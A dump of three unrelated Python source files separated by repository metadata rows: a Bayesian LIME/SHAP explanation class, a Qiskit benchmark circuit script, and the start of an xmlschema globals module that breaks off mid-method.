"""Bayesian Local Explanations.
This code implements bayesian local explanations. The code supports the LIME & SHAP
kernels. Along with the LIME & SHAP feature importances, bayesian local explanations
also support uncertainty expression over the feature importances.
"""
import logging
from copy import deepcopy
from functools import reduce
from multiprocessing import Pool
import numpy as np
import operator as op
from tqdm import tqdm
import sklearn
import sklearn.preprocessing
from sklearn.linear_model import Ridge, Lasso
from lime import lime_image, lime_tabular
from bayes.regression import BayesianLinearRegression
LDATA, LINVERSE, LSCALED, LDISTANCES, LY = list(range(5))
SDATA, SINVERSE, SY = list(range(3))
class BayesLocalExplanations:
"""Bayesian Local Explanations.
This class implements the bayesian local explanations.
"""
def __init__(self,
training_data,
data="image",
kernel="lime",
credible_interval=95,
mode="classification",
categorical_features=[],
discretize_continuous=True,
save_logs=False,
log_file_name="bayes.log",
width=0.75,
verbose=False):
"""Initialize the local explanations.
Arguments:
training_data: The
data: The type of data, either "image" or "tabular"
kernel: The kernel to use, either "lime" or "shap"
credible_interval: The % credible interval to use for the feature importance
uncertainty.
mode: Whether to run with classification or regression.
categorical_features: The indices of the categorical features, if in regression mode.
save_logs: Whether to save logs from the run.
log_file_name: The name of log file.
"""
assert kernel in ["lime", "shap"], f"Kernel must be one of lime or shap, not {kernel}"
assert data in ["image", "tabular"], f"Data must be one of image or tabular, not {data}"
assert mode in ["classification"], "Others modes like regression are not implemented"
if save_logs:
logging.basicConfig(filename=log_file_name,
filemode='a',
level=logging.INFO)
logging.info("==============================================")
logging.info("Initializing Bayes%s %s explanations", kernel, data)
logging.info("~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~")
self.cred_int = credible_interval
self.data = data
self.kernel = kernel
self.mode = mode
self.categorical_features = categorical_features
self.discretize_continuous = discretize_continuous
self.verbose = verbose
self.width = width * np.sqrt(training_data.shape[1])
logging.info("Setting mode to %s", mode)
logging.info("Credible interval set to %s", self.cred_int)
if kernel == "shap" and data == "tabular":
logging.info("Setting discretize_continuous to True, due to shapley sampling")
discretize_continuous = True
self.training_data = training_data
self._run_init(training_data)
def _run_init(self, training_data):
if self.kernel == "lime":
lime_tab_exp = lime_tabular.LimeTabularExplainer(training_data,
mode=self.mode,
categorical_features=self.categorical_features,
discretize_continuous=self.discretize_continuous)
self.lime_info = lime_tab_exp
elif self.kernel == "shap":
# Discretization forcibly set to true for shap sampling on initialization
shap_tab_exp = lime_tabular.LimeTabularExplainer(training_data,
mode=self.mode,
categorical_features=self.categorical_features,
discretize_continuous=self.discretize_continuous)
self.shap_info = shap_tab_exp
else:
raise NotImplementedError
def _log_args(self, args):
"""Logs arguments to function."""
logging.info(args)
def _shap_tabular_perturb_n_samples(self,
data,
n_samples,
max_coefs=None):
"""Generates n shap perturbations"""
if max_coefs is None:
max_coefs = np.arange(data.shape[0])
pre_rdata, pre_inverse = self.shap_info._LimeTabularExplainer__data_inverse(data_row=data,
num_samples=n_samples)
rdata = pre_rdata[:, max_coefs]
inverse = np.tile(data, (n_samples, 1))
inverse[:, max_coefs] = pre_inverse[:, max_coefs]
return rdata, inverse
def _lime_tabular_perturb_n_samples(self,
data,
n_samples):
"""Generates n_perturbations for LIME."""
rdata, inverse = self.lime_info._LimeTabularExplainer__data_inverse(data_row=data,
num_samples=n_samples)
scaled_data = (rdata - self.lime_info.scaler.mean_) / self.lime_info.scaler.scale_
distances = sklearn.metrics.pairwise_distances(
scaled_data,
scaled_data[0].reshape(1, -1),
metric='euclidean'
).ravel()
return rdata, inverse, scaled_data, distances
def _stack_tabular_return(self, existing_return, perturb_return):
"""Stacks data from new tabular return to existing return."""
if len(existing_return) == 0:
return perturb_return
new_return = []
for i, item in enumerate(existing_return):
new_return.append(np.concatenate((item, perturb_return[i]), axis=0))
return new_return
def _select_indices_from_data(self, perturb_return, indices, predictions):
"""Gets each element from the perturb return according to indices, then appends the predictions."""
# Previoulsy had this set to range(4)
temp = [perturb_return[i][indices] for i in range(len(perturb_return))]
temp.append(predictions)
return temp
def shap_tabular_focus_sample(self,
data,
classifier_f,
label,
n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
to_consider=10_000,
tempurature=1e-2,
enumerate_initial=True):
"""Focus sample n_samples perturbations for lime tabular."""
assert focus_sample_initial_points > 0, "Initial focusing sample points cannot be <= 0"
current_n_perturbations = 0
# Get 1's coalitions, if requested
if enumerate_initial:
enumerate_init_p = self._enumerate_initial_shap(data)
current_n_perturbations += enumerate_init_p[0].shape[0]
else:
enumerate_init_p = None
if self.verbose:
pbar = tqdm(total=n_samples)
pbar.update(current_n_perturbations)
# Get initial points
if current_n_perturbations < focus_sample_initial_points:
initial_perturbations = self._shap_tabular_perturb_n_samples(data, focus_sample_initial_points - current_n_perturbations)
if enumerate_init_p is not None:
current_perturbations = self._stack_tabular_return(enumerate_init_p, initial_perturbations)
else:
current_perturbations = initial_perturbations
current_n_perturbations += initial_perturbations[0].shape[0]
else:
current_perturbations = enumerate_init_p
current_perturbations = list(current_perturbations)
# Store initial predictions
current_perturbations.append(classifier_f(current_perturbations[SINVERSE])[:, label])
if self.verbose:
pbar.update(initial_perturbations[0].shape[0])
while current_n_perturbations < n_samples:
current_batch_size = min(focus_sample_batch_size, n_samples - current_n_perturbations)
# Init current BLR
blr = BayesianLinearRegression(percent=self.cred_int)
weights = self._get_shap_weights(current_perturbations[SDATA], current_perturbations[SDATA].shape[1])
blr.fit(current_perturbations[SDATA], current_perturbations[-1], weights, compute_creds=False)
candidate_perturbations = self._shap_tabular_perturb_n_samples(data, to_consider)
_, var = blr.predict(candidate_perturbations[SINVERSE])
# Get sampling weighting
var /= tempurature
exp_var = np.exp(var)
all_exp = np.sum(exp_var)
tempurature_scaled_weights = exp_var / all_exp
# Get sampled indices
least_confident_sample = np.random.choice(len(var), size=current_batch_size, p=tempurature_scaled_weights, replace=True)
# Get predictions
cy = classifier_f(candidate_perturbations[SINVERSE][least_confident_sample])[:, label]
new_perturbations = self._select_indices_from_data(candidate_perturbations, least_confident_sample, cy)
current_perturbations = self._stack_tabular_return(current_perturbations, new_perturbations)
current_n_perturbations += new_perturbations[0].shape[0]
if self.verbose:
pbar.update(new_perturbations[0].shape[0])
return current_perturbations
def lime_tabular_focus_sample(self,
data,
classifier_f,
label,
n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
to_consider=10_000,
tempurature=5e-4,
existing_data=[]):
"""Focus sample n_samples perturbations for lime tabular."""
current_n_perturbations = 0
# Get initial focus sampling batch
if len(existing_data) < focus_sample_initial_points:
# If there's existing data, make sure we only sample up to existing_data points
initial_perturbations = self._lime_tabular_perturb_n_samples(data, focus_sample_initial_points - len(existing_data))
current_perturbations = self._stack_tabular_return(existing_data, initial_perturbations)
else:
current_perturbations = existing_data
if self.verbose:
pbar = tqdm(total=n_samples)
current_perturbations = list(current_perturbations)
current_n_perturbations += initial_perturbations[0].shape[0]
# Store predictions on initial data
current_perturbations.append(classifier_f(current_perturbations[LINVERSE])[:, label])
if self.verbose:
pbar.update(initial_perturbations[0].shape[0])
# Sample up to n_samples
while current_n_perturbations < n_samples:
# If batch size would exceed n_samples, only sample enough to reach n_samples
current_batch_size = min(focus_sample_batch_size, n_samples - current_n_perturbations)
# Init current BLR
blr = BayesianLinearRegression(percent=self.cred_int)
# Get weights on current distances
weights = self._lime_kernel(current_perturbations[LDISTANCES], self.width)
# Fit blr on current perturbations & data
blr.fit(current_perturbations[LDATA], current_perturbations[LY], weights)
# Get set of perturbations to consider labeling
candidate_perturbations = self._lime_tabular_perturb_n_samples(data, to_consider)
_, var = blr.predict(candidate_perturbations[LDATA])
# Reweight
var /= tempurature
exp_var = np.exp(var)
all_exp = np.sum(exp_var)
tempurature_scaled_weights = exp_var / all_exp
# Get sampled indices
least_confident_sample = np.random.choice(len(var), size=current_batch_size, p=tempurature_scaled_weights, replace=False)
# Get predictions
cy = classifier_f(candidate_perturbations[LINVERSE][least_confident_sample])[:, label]
new_perturbations = self._select_indices_from_data(candidate_perturbations, least_confident_sample, cy)
current_perturbations = self._stack_tabular_return(current_perturbations, new_perturbations)
current_n_perturbations += new_perturbations[0].shape[0]
if self.verbose:
pbar.update(new_perturbations[0].shape[0])
return current_perturbations
def _lime_kernel(self, d, kernel_width):
return np.sqrt(np.exp(-(d ** 2) / kernel_width ** 2))
def _explain_bayes_lime(self,
data,
classifier_f,
label,
focus_sample,
cred_width,
n_samples,
max_n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
ptg_initial_points,
to_consider):
"""Computes the bayeslime tabular explanations."""
# Case where only n_samples is specified and not focused sampling
if n_samples is not None and not focus_sample:
logging.info("Generating bayeslime explanation with %s samples", n_samples)
# Generate perturbations
rdata, inverse, scaled_data, distances = self._lime_tabular_perturb_n_samples(data, n_samples)
weights = self._lime_kernel(distances, self.width)
y = classifier_f(inverse)[:, label]
blr = BayesianLinearRegression(percent=self.cred_int)
blr.fit(rdata, y, weights)
# Focus sampling
elif focus_sample:
logging.info("Starting focused sampling")
if n_samples:
logging.info("n_samples preset, running focused sampling up to %s samples", n_samples)
logging.info("using batch size %s with %s initial points", focus_sample_batch_size, focus_sample_initial_points)
focused_sampling_output = self.lime_tabular_focus_sample(data,
classifier_f,
label,
n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
to_consider=to_consider,
existing_data=[])
rdata = focused_sampling_output[LDATA]
distances = focused_sampling_output[LDISTANCES]
y = focused_sampling_output[LY]
blr = BayesianLinearRegression(percent=self.cred_int)
weights = self._lime_kernel(distances, self.width)
blr.fit(rdata, y, weights)
else:
# Use ptg to get the number of samples, then focus sample
# Note, this isn't used in the paper, this case currently isn't implemented
raise NotImplementedError
else:
# PTG Step 1, get initial
rdata, inverse, scaled_data, distances = self._lime_tabular_perturb_n_samples(data, ptg_initial_points)
weights = self._lime_kernel(distances, self.width)
y = classifier_f(inverse)[:, label]
blr = BayesianLinearRegression(percent=self.cred_int)
blr.fit(rdata, y, weights)
# PTG Step 2, get additional points needed
n_needed = int(np.ceil(blr.get_ptg(cred_width)))
if self.verbose:
tqdm.write(f"Additional Number of perturbations needed is {n_needed}")
ptg_rdata, ptg_inverse, ptg_scaled_data, ptg_distances = self._lime_tabular_perturb_n_samples(data, n_needed - ptg_initial_points)
ptg_weights = self._lime_kernel(ptg_distances, self.width)
rdata = np.concatenate((rdata, ptg_rdata), axis=0)
inverse = np.concatenate((inverse, ptg_inverse), axis=0)
scaled_data = np.concatenate((scaled_data, ptg_scaled_data), axis=0)
distances = np.concatenate((distances, ptg_distances), axis=0)
# Run final model
ptgy = classifier_f(ptg_inverse)[:, label]
y = np.concatenate((y, ptgy), axis=0)
blr = BayesianLinearRegression(percent=self.cred_int)
blr.fit(rdata, y, self._lime_kernel(distances, self.width))
# Format output for returning
output = {
"data": rdata,
"y": y,
"distances": distances,
"blr": blr,
"coef": blr.coef_,
"max_coefs": None # Included for consistency purposes w/ bayesshap
}
return output
def _get_shap_weights(self, data, M):
"""Gets shap weights. This assumes data is binary."""
nonzero = np.count_nonzero(data, axis=1)
weights = []
for nz in nonzero:
denom = (nCk(M, nz) * nz * (M - nz))
# Stabilize kernel
if denom == 0:
weight = 1.0
else:
weight = ((M - 1) / denom)
weights.append(weight)
return weights
def _enumerate_initial_shap(self, data, max_coefs=None):
"""Enumerate 1's for stability."""
if max_coefs is None:
data = np.eye(data.shape[0])
inverse = self.shap_info.discretizer.undiscretize(data)
return data, inverse
else:
data = np.zeros((max_coefs.shape[0], data.shape[0]))
for i in range(max_coefs.shape[0]):
data[i, max_coefs[i]] = 1
inverse = self.shap_info.discretizer.undiscretize(data)
return data[:, max_coefs], inverse
def _explain_bayes_shap(self,
data,
classifier_f,
label,
focus_sample,
cred_width,
n_samples,
max_n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
ptg_initial_points,
to_consider,
feature_select_num_points=1_000,
n_features=10,
l2=True,
enumerate_initial=True,
feature_selection=True,
max_coefs=None):
"""Computes the bayesshap tabular explanations."""
if feature_selection and max_coefs is None:
n_features = min(n_features, data.shape[0])
_, feature_select_inverse = self._shap_tabular_perturb_n_samples(data, feature_select_num_points)
lr = Ridge().fit(feature_select_inverse, classifier_f(feature_select_inverse)[:, label])
max_coefs = np.argsort(np.abs(lr.coef_))[-1 * n_features:]
elif feature_selection and max_coefs is not None:
pass
else:
max_coefs = None
# Case without focused sampling
if n_samples is not None and not focus_sample:
logging.info("Generating bayesshap explanation with %s samples", n_samples)
# Enumerate single coalitions, if requested
if enumerate_initial:
data_init, inverse_init = self._enumerate_initial_shap(data, max_coefs)
n_more = n_samples - inverse_init.shape[0]
else:
n_more = n_samples
rdata, inverse = self._shap_tabular_perturb_n_samples(data, n_more, max_coefs)
if enumerate_initial:
rdata = np.concatenate((data_init, rdata), axis=0)
inverse = np.concatenate((inverse_init, inverse), axis=0)
y = classifier_f(inverse)[:, label]
weights = self._get_shap_weights(rdata, M=rdata.shape[1])
blr = BayesianLinearRegression(percent=self.cred_int)
blr.fit(rdata, y, weights)
elif focus_sample:
if feature_selection:
raise NotImplementedError
logging.info("Starting focused sampling")
if n_samples:
logging.info("n_samples preset, running focused sampling up to %s samples", n_samples)
logging.info("using batch size %s with %s initial points", focus_sample_batch_size, focus_sample_initial_points)
focused_sampling_output = self.shap_tabular_focus_sample(data,
classifier_f,
label,
n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
to_consider=to_consider,
enumerate_initial=enumerate_initial)
rdata = focused_sampling_output[SDATA]
y = focused_sampling_output[SY]
weights = self._get_shap_weights(rdata, rdata.shape[1])
blr = BayesianLinearRegression(percent=self.cred_int, l2=l2)
blr.fit(rdata, y, weights)
else:
# Use ptg to get the number of samples, then focus sample
# Note, this case isn't used in the paper and currently isn't implemented
raise NotImplementedError
else:
# Use PTG to get initial samples
# Enumerate intial points if requested
if enumerate_initial:
data_init, inverse_init = self._enumerate_initial_shap(data, max_coefs)
n_more = ptg_initial_points - inverse_init.shape[0]
else:
n_more = ptg_initial_points
# Perturb using initial samples
rdata, inverse = self._shap_tabular_perturb_n_samples(data, n_more, max_coefs)
if enumerate_initial:
rdata = np.concatenate((data_init, rdata), axis=0)
inverse = np.concatenate((inverse_init, inverse), axis=0)
# Get labels
y = classifier_f(inverse)[:, label]
# Fit BLR
weights = self._get_shap_weights(rdata, M=rdata.shape[1])
blr = BayesianLinearRegression(percent=self.cred_int, l2=l2)
blr.fit(rdata, y, weights)
# Compute PTG number needed
n_needed = int(np.ceil(blr.get_ptg(cred_width)))
ptg_rdata, ptg_inverse = self._shap_tabular_perturb_n_samples(data,
n_needed - ptg_initial_points,
max_coefs)
if self.verbose:
tqdm.write(f"{n_needed} more samples needed")
rdata = np.concatenate((rdata, ptg_rdata), axis=0)
inverse = np.concatenate((inverse, ptg_inverse), axis=0)
ptgy = classifier_f(ptg_inverse)[:, label]
weights = self._get_shap_weights(rdata, M=rdata.shape[1])
# Run final model
ptgy = classifier_f(ptg_inverse)[:, label]
y = np.concatenate((y, ptgy), axis=0)
blr = BayesianLinearRegression(percent=self.cred_int, l2=l2)
blr.fit(rdata, y, weights)
# Format output for returning
output = {
"data": rdata,
"y": y,
"distances": weights,
"blr": blr,
"coef": blr.coef_,
"max_coefs": max_coefs
}
return output
def explain(self,
data,
classifier_f,
label,
cred_width=1e-2,
focus_sample=True,
n_samples=None,
max_n_samples=10_000,
focus_sample_batch_size=2_500,
focus_sample_initial_points=100,
ptg_initial_points=200,
to_consider=10_000,
feature_selection=True,
n_features=15,
tag=None,
only_coef=False,
only_blr=False,
enumerate_initial=True,
max_coefs=None,
l2=True):
"""Explain an instance.
As opposed to other model agnostic explanations, the bayes explanations
accept a credible interval width instead of a number of perturbations
value.
If the credible interval is set to 95% (as is the default), the bayesian
explanations will generate feature importances that are +/- width/2
95% of the time.
Arguments:
data: The data instance to explain
classifier_f: The classification function. This function should return
probabilities for each label, where if there are M labels
and N instances, the output is of shape (N, M).
label: The label index to explain.
cred_width: The width of the credible interval of the resulting explanation. Note,
this serves as a upper bound in the implementation, the final credible
intervals may be tighter, because PTG is a bit approximate. Also, be
aware that for kernelshap, if we can compute the kernelshap values exactly
by enumerating all the coalitions.
focus_sample: Whether to use uncertainty sampling.
n_samples: If specified, n_samples with override the width setting feature
and compute the explanation with n_samples.
max_n_samples: The maximum number of samples to use. If the width is set to
a very small value and many samples are required, this serves
as a point to stop sampling.
focus_sample_batch_size: The batch size of focus sampling.
focus_sample_initial_points: The number of perturbations to collect before starting
focused sampling.
ptg_initial_points: The number perturbations to collect before computing the ptg estimate.
to_consider: The number of perturbations to consider in focused sampling.
feature_selection: Whether to do feature selection using Ridge regression. Note, currently
only implemented for BayesSHAP.
n_features: The number of features to use in feature selection.
tag: A tag to add the explanation.
only_coef: Only return the explanation means.
only_blr: Only return the bayesian regression object.
enumerate_initial: Whether to enumerate a set of initial shap coalitions.
l2: Whether to fit with l2 regression. Turning off the l2 regression can be useful for the shapley value estimation.
Returns:
explanation: The resulting feature importances, credible intervals, and bayes regression
object.
"""
assert isinstance(data, np.ndarray), "Data must be numpy array. Note, this means that classifier_f \
must accept numpy arrays."
self._log_args(locals())
if self.kernel == "lime" and self.data in ["tabular", "image"]:
output = self._explain_bayes_lime(data,
classifier_f,
label,
focus_sample,
cred_width,
n_samples,
max_n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
ptg_initial_points,
to_consider)
elif self.kernel == "shap" and self.data in ["tabular", "image"]:
output = self._explain_bayes_shap(data,
classifier_f,
label,
focus_sample,
cred_width,
n_samples,
max_n_samples,
focus_sample_batch_size,
focus_sample_initial_points,
ptg_initial_points,
to_consider,
feature_selection=feature_selection,
n_features=n_features,
enumerate_initial=enumerate_initial,
max_coefs=max_coefs,
l2=l2)
else:
pass
output['tag'] = tag
if only_coef:
return output['coef']
if only_blr:
return output['blr']
return output
def nCk(n, r):
"""n choose r
From: https://stackoverflow.com/questions/4941753/is-there-a-math-ncr-function-in-python"""
r = min(r, n-r)
numer = reduce(op.mul, range(n, n-r, -1), 1)
denom = reduce(op.mul, range(1, r+1), 1)
return numer / denom
def do_exp(args):
"""Supporting function for the explanations."""
i, data, init_kwargs, exp_kwargs, labels, max_coefs, pass_args = args
def do(data_i, label):
if pass_args is not None and pass_args.balance_background_dataset:
init_kwargs['training_data'] = np.concatenate((data_i[None, :], np.zeros((1, data_i.shape[0]))), axis=0)
exp = BayesLocalExplanations(**init_kwargs)
exp_kwargs['tag'] = i
exp_kwargs['label'] = label
if max_coefs is not None:
exp_kwargs['max_coefs'] = max_coefs[i]
e = deepcopy(exp.explain(data_i, **exp_kwargs))
return e
if labels is not None:
return do(data[i], labels[i])
else:
return do(data[i], exp_kwargs['label'])
def explain_many(all_data, init_kwargs, exp_kwargs, pool_size=1, verbose=False, labels=None, max_coefs=None, args=None):
"""Parallel explanations."""
with Pool(pool_size) as p:
if verbose:
results = list(tqdm(p.imap(do_exp, [(i, all_data, init_kwargs, exp_kwargs, labels, max_coefs, args) for i in range(all_data.shape[0])])))
else:
results = p.map(do_exp, [(i, all_data, init_kwargs, exp_kwargs, labels, max_coefs, args) for i in range(all_data.shape[0])])
return results
| 46.679487
| 149
| 0.552534
|
9725f01c84e8e91867f491b3ee192d682eaa79e8
| 4,153
|
py
|
Python
|
benchmark/startQiskit_Class974.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startQiskit_Class974.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
benchmark/startQiskit_Class974.py
|
UCLA-SEAL/QDiff
|
d968cbc47fe926b7f88b4adf10490f1edd6f8819
|
[
"BSD-3-Clause"
] | null | null | null |
# qubit number=5
# total number=43
import cirq
import qiskit
from qiskit import QuantumCircuit, QuantumRegister, ClassicalRegister
from qiskit import BasicAer, execute, transpile
from pprint import pprint
from qiskit.test.mock import FakeVigo
from math import log2,floor, sqrt, pi
import numpy as np
import networkx as nx
def build_oracle(n: int, f) -> QuantumCircuit:
# implement the oracle O_f^\pm
# NOTE: use U1 gate (P gate) with \lambda = 180 ==> CZ gate
# or multi_control_Z_gate (issue #127)
controls = QuantumRegister(n, "ofc")
oracle = QuantumCircuit(controls, name="Zf")
for i in range(2 ** n):
rep = np.binary_repr(i, n)
if f(rep) == "1":
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.h(controls[n])
if n >= 2:
oracle.mcu1(pi, controls[1:], controls[0])
for j in range(n):
if rep[j] == "0":
oracle.x(controls[j])
# oracle.barrier()
return oracle
def make_circuit(n:int,f) -> QuantumCircuit:
# circuit begin
input_qubit = QuantumRegister(n,"qc")
classical = ClassicalRegister(n, "qm")
prog = QuantumCircuit(input_qubit, classical)
prog.h(input_qubit[0]) # number=3
prog.h(input_qubit[1]) # number=4
prog.h(input_qubit[2]) # number=5
prog.h(input_qubit[3]) # number=6
prog.h(input_qubit[4]) # number=21
Zf = build_oracle(n, f)
repeat = floor(sqrt(2 ** n) * pi / 4)
for i in range(1):
prog.append(Zf.to_gate(), [input_qubit[i] for i in range(n)])
prog.h(input_qubit[0]) # number=1
prog.h(input_qubit[1]) # number=2
prog.h(input_qubit[2]) # number=7
prog.h(input_qubit[3]) # number=8
prog.h(input_qubit[0]) # number=33
prog.cz(input_qubit[1],input_qubit[0]) # number=34
prog.h(input_qubit[0]) # number=35
prog.rx(-0.7822565707438585,input_qubit[2]) # number=31
prog.x(input_qubit[0]) # number=29
prog.cx(input_qubit[1],input_qubit[0]) # number=30
prog.h(input_qubit[1]) # number=40
prog.cz(input_qubit[0],input_qubit[1]) # number=41
prog.h(input_qubit[1]) # number=42
prog.x(input_qubit[1]) # number=26
prog.cx(input_qubit[0],input_qubit[1]) # number=27
prog.cx(input_qubit[0],input_qubit[2]) # number=22
prog.x(input_qubit[2]) # number=23
prog.cx(input_qubit[0],input_qubit[2]) # number=24
prog.x(input_qubit[3]) # number=12
if n>=2:
prog.mcu1(pi,input_qubit[1:],input_qubit[0])
prog.x(input_qubit[0]) # number=13
prog.x(input_qubit[1]) # number=14
prog.x(input_qubit[2]) # number=15
prog.x(input_qubit[3]) # number=16
prog.h(input_qubit[0]) # number=17
prog.h(input_qubit[3]) # number=37
prog.cz(input_qubit[2],input_qubit[3]) # number=38
prog.h(input_qubit[3]) # number=39
prog.h(input_qubit[1]) # number=18
prog.h(input_qubit[2]) # number=19
prog.rx(2.5761059759436304,input_qubit[3]) # number=32
prog.h(input_qubit[3]) # number=20
prog.h(input_qubit[0])
prog.h(input_qubit[1])
prog.h(input_qubit[2])
prog.h(input_qubit[3])
# circuit end
return prog
if __name__ == '__main__':
key = "00000"
f = lambda rep: str(int(rep == key))
prog = make_circuit(5,f)
backend = BasicAer.get_backend('statevector_simulator')
sample_shot =7924
info = execute(prog, backend=backend).result().get_statevector()
qubits = round(log2(len(info)))
info = {
np.binary_repr(i, qubits): round((info[i]*(info[i].conjugate())).real,3)
for i in range(2 ** qubits)
}
backend = FakeVigo()
circuit1 = transpile(prog,backend,optimization_level=2)
writefile = open("../data/startQiskit_Class974.csv","w")
print(info,file=writefile)
print("results end", file=writefile)
print(circuit1.depth(),file=writefile)
print(circuit1,file=writefile)
writefile.close()
| 30.992537
| 80
| 0.603419
|
61011d5080e6c3b2ac3ef75ee603735d39ddfa02
| 16,621
|
py
|
Python
|
xmlschema/validators/globals_.py
|
jhermann/xmlschema
|
4251afc21b9ce254edcb75d0b11fe936b206a7d0
|
[
"MIT"
] | null | null | null |
xmlschema/validators/globals_.py
|
jhermann/xmlschema
|
4251afc21b9ce254edcb75d0b11fe936b206a7d0
|
[
"MIT"
] | null | null | null |
xmlschema/validators/globals_.py
|
jhermann/xmlschema
|
4251afc21b9ce254edcb75d0b11fe936b206a7d0
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
#
# Copyright (c), 2016-2018, SISSA (International School for Advanced Studies).
# All rights reserved.
# This file is distributed under the terms of the MIT License.
# See the file 'LICENSE' in the root directory of the present
# distribution, or http://opensource.org/licenses/MIT.
#
# @author Davide Brunato <brunato@sissa.it>
#
"""
This module contains functions and classes for managing namespaces's
XSD declarations/definitions.
"""
from __future__ import unicode_literals
import re
from ..exceptions import XMLSchemaKeyError, XMLSchemaTypeError, XMLSchemaValueError
from ..namespaces import XSD_NAMESPACE
from ..qnames import XSD_INCLUDE, XSD_IMPORT, XSD_REDEFINE, XSD_NOTATION, XSD_SIMPLE_TYPE, \
XSD_COMPLEX_TYPE, XSD_GROUP, XSD_ATTRIBUTE, XSD_ATTRIBUTE_GROUP, XSD_ELEMENT, XSD_ANY_TYPE
from ..helpers import get_qname, local_name, prefixed_to_qname
from ..namespaces import NamespaceResourcesMap
from . import XMLSchemaNotBuiltError, XsdValidator, XsdKeyref, XsdComponent, XsdAttribute, \
XsdSimpleType, XsdComplexType, XsdElement, XsdAttributeGroup, XsdGroup, XsdNotation
from .builtins import xsd_builtin_types_factory
def camel_case_split(s):
"""
Split words of a camel case string
"""
return re.findall(r'[A-Z]?[a-z]+|[A-Z]+(?=[A-Z]|$)', s)
def iterchildren_by_tag(tag):
"""
Defines a generator that produce all child elements that have a specific tag.
"""
def iterfind_function(elem):
for e in elem:
if e.tag == tag:
yield e
iterfind_function.__name__ = str('iterfind_xsd_%ss' % '_'.join(camel_case_split(local_name(tag))).lower())
return iterfind_function
iterchildren_xsd_import = iterchildren_by_tag(XSD_IMPORT)
iterchildren_xsd_include = iterchildren_by_tag(XSD_INCLUDE)
iterchildren_xsd_redefine = iterchildren_by_tag(XSD_REDEFINE)
#
# Defines the load functions for XML Schema structures
def create_load_function(filter_function):
def load_xsd_globals(xsd_globals, schemas):
redefinitions = []
for schema in schemas:
target_namespace = schema.target_namespace
for elem in iterchildren_xsd_redefine(schema.root):
for child in filter_function(elem):
qname = get_qname(target_namespace, child.attrib['name'])
redefinitions.append((qname, (child, schema)))
for elem in filter_function(schema.root):
qname = get_qname(target_namespace, elem.attrib['name'])
try:
xsd_globals[qname].append((elem, schema))
except KeyError:
xsd_globals[qname] = (elem, schema)
except AttributeError:
xsd_globals[qname] = [xsd_globals[qname], (elem, schema)]
for qname, obj in redefinitions:
if qname not in xsd_globals:
elem, schema = obj
schema.parse_error("not a redefinition!", elem)
else:
try:
xsd_globals[qname].append(obj)
except KeyError:
xsd_globals[qname] = obj
except AttributeError:
xsd_globals[qname] = [xsd_globals[qname], obj]
return load_xsd_globals
load_xsd_simple_types = create_load_function(iterchildren_by_tag(XSD_SIMPLE_TYPE))
load_xsd_attributes = create_load_function(iterchildren_by_tag(XSD_ATTRIBUTE))
load_xsd_attribute_groups = create_load_function(iterchildren_by_tag(XSD_ATTRIBUTE_GROUP))
load_xsd_complex_types = create_load_function(iterchildren_by_tag(XSD_COMPLEX_TYPE))
load_xsd_elements = create_load_function(iterchildren_by_tag(XSD_ELEMENT))
load_xsd_groups = create_load_function(iterchildren_by_tag(XSD_GROUP))
load_xsd_notations = create_load_function(iterchildren_by_tag(XSD_NOTATION))
def create_lookup_function(xsd_classes):
if isinstance(xsd_classes, tuple):
types_desc = ' or '.join([c.__name__ for c in xsd_classes])
else:
types_desc = xsd_classes.__name__
def lookup(global_map, qname, tag_map):
try:
obj = global_map[qname]
except KeyError:
raise XMLSchemaKeyError("missing a %s object for %r!" % (types_desc, qname))
else:
if isinstance(obj, xsd_classes):
return obj
elif isinstance(obj, tuple):
# Not built XSD global component without redefinitions
try:
elem, schema = obj
except ValueError:
return obj[0] # Circular build, simply return (elem, schema) couple
try:
factory_or_class = tag_map[elem.tag]
except KeyError:
raise XMLSchemaKeyError("wrong element %r for map %r." % (elem, global_map))
global_map[qname] = obj, # Encapsulate into a single-item tuple to catch circular builds
global_map[qname] = factory_or_class(elem, schema, parent=None)
return global_map[qname]
elif isinstance(obj, list):
if not isinstance(obj[0], xsd_classes):
# Not built XSD global component with redefinitions
try:
elem, schema = obj[0]
except ValueError:
return obj[0][0] # Circular build, simply return (elem, schema) couple
try:
factory_or_class = tag_map[elem.tag]
except KeyError:
raise XMLSchemaKeyError("wrong element %r for map %r." % (elem, global_map))
global_map[qname] = obj[0], # To catch circular builds
global_map[qname] = factory_or_class(elem, schema, parent=None)
else:
# Built-in type
global_map[qname] = obj[0]
for elem, schema in obj[1:]:
global_map[qname].schema = schema
global_map[qname].elem = elem
return global_map[qname]
else:
raise XMLSchemaTypeError(
"wrong instance %s for XSD global %r, a %s required." % (obj, qname, types_desc)
)
return lookup
lookup_notation = create_lookup_function(XsdNotation)
lookup_type = create_lookup_function((XsdSimpleType, XsdComplexType))
lookup_attribute = create_lookup_function(XsdAttribute)
lookup_attribute_group = create_lookup_function(XsdAttributeGroup)
lookup_group = create_lookup_function(XsdGroup)
lookup_element = create_lookup_function(XsdElement)
class XsdGlobals(XsdValidator):
"""
Mediator class for related XML schema instances. It stores the global
declarations defined in the registered schemas. Register a schema to
add it's declarations to the global maps.
:param validator: the XMLSchema class to use for global maps.
:param validation: the XSD validation mode to use, can be 'strict', 'lax' or 'skip'.
"""
def __init__(self, validator, validation='strict'):
super(XsdGlobals, self).__init__(validation)
self.validator = validator
self.namespaces = NamespaceResourcesMap() # Registered schemas by namespace URI
self.types = {} # Global types (both complex and simple)
self.attributes = {} # Global attributes
self.attribute_groups = {} # Attribute groups
self.groups = {} # Model groups
self.notations = {} # Notations
self.elements = {} # Global elements
self.substitution_groups = {} # Substitution groups
self.constraints = {} # Constraints (uniqueness, keys, keyref)
self.global_maps = (self.notations, self.types, self.attributes,
self.attribute_groups, self.groups, self.elements)
def copy(self, validation=None):
"""Makes a copy of the object."""
obj = XsdGlobals(self.validator, validation or self.validation)
